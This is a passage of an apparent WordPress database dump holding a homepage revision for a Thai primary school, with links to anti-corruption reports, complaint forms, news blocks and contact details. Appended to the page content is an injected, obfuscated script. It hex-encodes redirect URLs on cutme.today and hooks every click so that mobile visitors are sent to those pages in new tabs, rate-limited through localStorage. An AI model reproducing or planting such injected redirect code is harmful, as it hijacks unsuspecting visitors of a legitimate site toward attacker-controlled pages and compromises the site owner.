900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 09:50:28','2024-08-30 02:50:28','',19,'http://watprato.ssk.in.th/?p=288',0,'revision','',0),
